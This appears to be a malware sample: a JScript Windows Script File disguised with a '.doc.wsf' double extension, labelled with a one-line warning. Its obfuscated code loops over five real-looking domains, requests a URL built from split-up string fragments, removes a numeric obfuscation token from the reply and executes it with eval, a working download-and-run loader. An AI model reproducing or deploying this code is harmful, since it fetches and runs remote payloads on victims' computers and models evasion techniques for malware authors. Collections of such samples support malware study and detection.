Ground-Label-04139869.doc.wsf

1. // This is malicious. Don't run it.
2. //<job><script language=JScript>
3. function gag() { return "Msxml2.XMLHTTP"; };
4. var x = new Array("www.yabaojiuhe.com","www.mercurycharters.co.nz","dev.zodia-q.com","zodia-q.com","acpu.com.br");
5. function rov() { return "counter"; }
6. function htt() { return "http://"; };
7. function sut() { return "1BC74QeanjciWxYQAzxZN3ZGiBn3J7mXSi&m="; };
8. function cou() { return "/"+rov()+"/?a="; };
9. function fiv() { return "a"; };
10. function cay(z) {
11.     z = z.split(rox());
12.     z = z.join(fiv());
13.     eval(z);
14. };
15. function boe() { return "&i=Y5rpzua6RhRlo6-X5d0IbVP2MdO2AoWFXsMBAcvdDx6Plin4AOfIXZpsoV11vAWgvPDwhU7zlZmNFCy53FLlGUbh7H4jLg"; };
16. function tog(x) { return htt() + x + cou() + sut() + rox() + boe(); };
17. function rox() { return "7600971"; };
18. for (var i=0; i<5; i++) {
19.     try {
20.         var e = new ActiveXObject(gag());
21.         e.open("GET", tog(x[i]), false);
22.         e.send();
23.         if (e.status == 200) {
24.             cay(e.responseText);
25.             break;
26.         };
27.     } catch(e) {
28.     };
29. };
30. //</script></job>